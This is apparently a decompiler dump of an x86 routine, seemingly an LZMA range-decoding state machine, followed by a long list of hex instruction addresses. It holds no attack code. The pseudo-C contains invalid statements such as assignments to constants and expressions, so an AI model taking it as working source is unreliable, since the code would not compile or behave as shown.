								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                0x00405e05
                                                                                0x00405e0c
                                                                                0x00405e12
                                                                                0x00405e18
                                                                                0x00000000
                                                                                0x00405e1c
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x00000000
                                                                                0x00405e3e
                                                                                0x00405e42
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e4b
                                                                                0x00405e4e
                                                                                0x00405e51
                                                                                0x00405e53
                                                                                0x00405e55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e5b
                                                                                0x00405e5e
                                                                                0x00405e60
                                                                                0x00405e61
                                                                                0x00405e64
                                                                                0x00405e66
                                                                                0x00405e67
                                                                                0x00405e69
                                                                                0x00405e6c
                                                                                0x00405e71
                                                                                0x00405e76
                                                                                0x00405e7f
                                                                                0x00405e92
                                                                                0x00405e95
                                                                                0x00405e9e
                                                                                0x00405ea1
                                                                                0x00405ec9
                                                                                0x00405ec9
                                                                                0x00405ecb
                                                                                0x00405ed9
                                                                                0x00405ed9
                                                                                0x00405edd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ecd
                                                                                0x00405ed0
                                                                                0x00405ed0
                                                                                0x00405ed1
                                                                                0x00405ed1
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ea3
                                                                                0x00405ea7
                                                                                0x00405eac
                                                                                0x00405eac
                                                                                0x00405eb5
                                                                                0x00405ebb
                                                                                0x00405ebd
                                                                                0x00405ec0
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ee3
                                                                                0x00405ee3
                                                                                0x00405ee7
                                                                                0x00406793
                                                                                0x00000000
                                                                                0x00406793
                                                                                0x00405ef0
                                                                                0x00405f00
                                                                                0x00405f03
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f09
                                                                                0x00405f09
                                                                                0x00405f0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f0f
                                                                                0x00405f12
                                                                                0x00405f15
                                                                                0x00405f3f
                                                                                0x00405f45
                                                                                0x00405f4c
                                                                                0x00000000
                                                                                0x00405f4c
                                                                                0x00405f17
                                                                                0x00405f1b
                                                                                0x00405f1e
                                                                                0x00405f23
                                                                                0x00405f23
                                                                                0x00405f2e
                                                                                0x00405f34
                                                                                0x00405f36
                                                                                0x00405f39
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f7e
                                                                                0x00405f84
                                                                                0x00405f87
                                                                                0x00405f94
                                                                                0x00405f9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f53
                                                                                0x00405f53
                                                                                0x00405f57
                                                                                0x004067a2
                                                                                0x00000000
                                                                                0x004067a2
                                                                                0x00405f63
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f71
                                                                                0x00405f74
                                                                                0x00405f77
                                                                                0x00405f7a
                                                                                0x00405f7c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406613
                                                                                0x00406613
                                                                                0x00406619
                                                                                0x0040661f
                                                                                0x00406622
                                                                                0x00406625
                                                                                0x0040663f
                                                                                0x00406642
                                                                                0x00406648
                                                                                0x00406653
                                                                                0x00406653
                                                                                0x00406655
                                                                                0x00406627
                                                                                0x00406627
                                                                                0x00406636
                                                                                0x0040663a
                                                                                0x0040663a
                                                                                0x00406658
                                                                                0x0040665f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406661
                                                                                0x00406661
                                                                                0x00406665
                                                                                0x00406814
                                                                                0x00000000
                                                                                0x00406814
                                                                                0x00406671
                                                                                0x00406678
                                                                                0x00406680
                                                                                0x00406680
                                                                                0x00406680
                                                                                0x00406683
                                                                                0x00406686
                                                                                0x00406686
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405fa4
                                                                                0x00405fa6
                                                                                0x00405fa9
                                                                                0x0040601a
                                                                                0x0040601d
                                                                                0x00406020
                                                                                0x00406027
                                                                                0x00406031
                                                                                0x00000000
                                                                                0x00406031
                                                                                0x00405fab
                                                                                0x00405faf
                                                                                0x00405fb2
                                                                                0x00405fb4
                                                                                0x00405fb7
                                                                                0x00405fba
                                                                                0x00405fbc
                                                                                0x00405fbf
                                                                                0x00405fc1
                                                                                0x00405fc6
                                                                                0x00405fc9
                                                                                0x00405fcc
                                                                                0x00405fd0
                                                                                0x00405fd7
                                                                                0x00405fda
                                                                                0x00405fe1
                                                                                0x00405fe5
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405ff1
                                                                                0x00405ff4
                                                                                0x00406012
                                                                                0x00406014
                                                                                0x00000000
                                                                                0x00406014
                                                                                0x00405ff6
                                                                                0x00405ff9
                                                                                0x00405ffc
                                                                                0x00405fff
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406004
                                                                                0x00406007
                                                                                0x00406009
                                                                                0x0040600a
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406243
                                                                                0x00406247
                                                                                0x00406265
                                                                                0x00406268
                                                                                0x0040626f
                                                                                0x00406272
                                                                                0x00406275
                                                                                0x00406278
                                                                                0x0040627b
                                                                                0x0040627e
                                                                                0x00406280
                                                                                0x00406287
                                                                                0x00406288
                                                                                0x0040628a
                                                                                0x0040628d
                                                                                0x00406290
                                                                                0x00406293
                                                                                0x00406293
                                                                                0x00406298
                                                                                0x00000000
                                                                                0x00406298
                                                                                0x00406249
                                                                                0x0040624c
                                                                                0x0040624f
                                                                                0x00406259
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062ad
                                                                                0x004062b1
                                                                                0x004062d4
                                                                                0x004062d7
                                                                                0x004062da
                                                                                0x004062e4
                                                                                0x004062b3
                                                                                0x004062b3
                                                                                0x004062b6
                                                                                0x004062b9
                                                                                0x004062bc
                                                                                0x004062c9
                                                                                0x004062cc
                                                                                0x004062cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062f0
                                                                                0x004062f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062fa
                                                                                0x004062fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406304
                                                                                0x00406306
                                                                                0x0040630a
                                                                                0x0040630a
                                                                                0x0040630d
                                                                                0x00406311
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406361
                                                                                0x00406365
                                                                                0x0040636c
                                                                                0x0040636f
                                                                                0x00406372
                                                                                0x0040637c
                                                                                0x00000000
                                                                                0x0040637c
                                                                                0x00406367
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406388
                                                                                0x0040638c
                                                                                0x00406393
                                                                                0x00406396
                                                                                0x00406399
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040639c
                                                                                0x0040639f
                                                                                0x004063a2
                                                                                0x004063a2
                                                                                0x004063a5
                                                                                0x004063a8
                                                                                0x004063ab
                                                                                0x004063ab
                                                                                0x004063ae
                                                                                0x004063b5
                                                                                0x004063ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406448
                                                                                0x00406448
                                                                                0x0040644c
                                                                                0x004067ea
                                                                                0x00000000
                                                                                0x004067ea
                                                                                0x00406452
                                                                                0x00406455
                                                                                0x00406458
                                                                                0x0040645c
                                                                                0x0040645f
                                                                                0x00406465
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x0040646a
                                                                                0x0040646d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040603d
                                                                                0x0040603d
                                                                                0x00406041
                                                                                0x004067ae
                                                                                0x00000000
                                                                                0x004067ae
                                                                                0x00406047
                                                                                0x0040604a
                                                                                0x0040604d
                                                                                0x00406051
                                                                                0x00406054
                                                                                0x0040605a
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605f
                                                                                0x00406062
                                                                                0x00406062
                                                                                0x00406065
                                                                                0x00406068
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040606e
                                                                                0x00406074
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040607a
                                                                                0x0040607a
                                                                                0x0040607e
                                                                                0x00406081
                                                                                0x00406084
                                                                                0x00406087
                                                                                0x0040608a
                                                                                0x0040608b
                                                                                0x0040608e
                                                                                0x00406090
                                                                                0x00406096
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x0040609f
                                                                                0x004060a2
                                                                                0x004060a5
                                                                                0x004060a8
                                                                                0x004060c4
                                                                                0x004060c7
                                                                                0x004060ca
                                                                                0x004060cd
                                                                                0x004060d4
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060de
                                                                                0x004060aa
                                                                                0x004060aa
                                                                                0x004060ae
                                                                                0x004060b6
                                                                                0x004060bb
                                                                                0x004060bd
                                                                                0x004060bf
                                                                                0x004060bf
                                                                                0x004060e1
                                                                                0x004060e8
                                                                                0x004060eb
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f6
                                                                                0x004060f6
                                                                                0x004060fa
                                                                                0x004067ba
                                                                                0x00000000
                                                                                0x004067ba
                                                                                0x00406100
                                                                                0x00406103
                                                                                0x00406106
                                                                                0x0040610a
                                                                                0x0040610d
                                                                                0x00406113
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x00406121
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406123
                                                                                0x00406126
                                                                                0x00406129
                                                                                0x0040612c
                                                                                0x0040612f
                                                                                0x00406132
                                                                                0x00406135
                                                                                0x00406138
                                                                                0x0040613b
                                                                                0x0040613e
                                                                                0x00406141
                                                                                0x00406159
                                                                                0x0040615c
                                                                                0x0040615f
                                                                                0x00406162
                                                                                0x00406162
                                                                                0x00406165
                                                                                0x00406169
                                                                                0x0040616b
                                                                                0x00406143
                                                                                0x00406143
                                                                                0x0040614b
                                                                                0x00406150
                                                                                0x00406152
                                                                                0x00406154
                                                                                0x00406154
                                                                                0x0040616e
                                                                                0x00406175
                                                                                0x00406178
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406178
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004061ba
                                                                                0x004061ba
                                                                                0x004061be
                                                                                0x004067c6
                                                                                0x00000000
                                                                                0x004067c6
                                                                                0x004061c4
                                                                                0x004061c7
                                                                                0x004061ca
                                                                                0x004061ce
                                                                                0x004061d1
                                                                                0x004061d7
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061dc
                                                                                0x004061df
                                                                                0x004061df
                                                                                0x004061e5
                                                                                0x00406183
                                                                                0x00406183
                                                                                0x00406186
                                                                                0x00000000
                                                                                0x00406186
                                                                                0x004061e7
                                                                                0x004061e7
                                                                                0x004061ea
                                                                                0x004061ed
                                                                                0x004061f0
                                                                                0x004061f3
                                                                                0x004061f6
                                                                                0x004061f9
                                                                                0x004061fc
                                                                                0x004061ff
                                                                                0x00406202
                                                                                0x00406205
                                                                                0x0040621d
                                                                                0x00406220
                                                                                0x00406223
                                                                                0x00406226
                                                                                0x00406226
                                                                                0x00406229
                                                                                0x0040622d
                                                                                0x0040622f
                                                                                0x00406207
                                                                                0x00406207
                                                                                0x0040620f
                                                                                0x00406214
                                                                                0x00406216
                                                                                0x00406218
                                                                                0x00406218
                                                                                0x00406232
                                                                                0x00406239
                                                                                0x0040623c
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x004064cb
                                                                                0x004064cb
                                                                                0x004064cf
                                                                                0x004067f6
                                                                                0x00000000
                                                                                0x004067f6
                                                                                0x004064d5
                                                                                0x004064d8
                                                                                0x004064db
                                                                                0x004064df
                                                                                0x004064e2
                                                                                0x004064e8
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040629b
                                                                                0x0040629b
                                                                                0x0040629e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004065da
                                                                                0x004065de
                                                                                0x00406600
                                                                                0x00406603
                                                                                0x0040660d
                                                                                0x00406610
                                                                                0x00406610
                                                                                0x00000000
                                                                                0x00406610
                                                                                0x004065e0
                                                                                0x004065e3
                                                                                0x004065e7
                                                                                0x004065ea
                                                                                0x004065ea
                                                                                0x004065ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406697
                                                                                0x0040669b
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066c0
                                                                                0x004066c7
                                                                                0x004066ce
                                                                                0x004066ce
                                                                                0x00000000
                                                                                0x004066ce
                                                                                0x0040669d
                                                                                0x004066a0
                                                                                0x004066a3
                                                                                0x004066a6
                                                                                0x004066ad
                                                                                0x004065f1
                                                                                0x004065f1
                                                                                0x004065f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406788
                                                                                0x0040678b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063c2
                                                                                0x004063c4
                                                                                0x004063cb
                                                                                0x004063cc
                                                                                0x004063ce
                                                                                0x004063d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063d9
                                                                                0x004063dc
                                                                                0x004063df
                                                                                0x004063e1
                                                                                0x004063e3
                                                                                0x004063e3
                                                                                0x004063e4
                                                                                0x004063e7
                                                                                0x004063ee
                                                                                0x004063f1
                                                                                0x004063ff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066d5
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x00000000
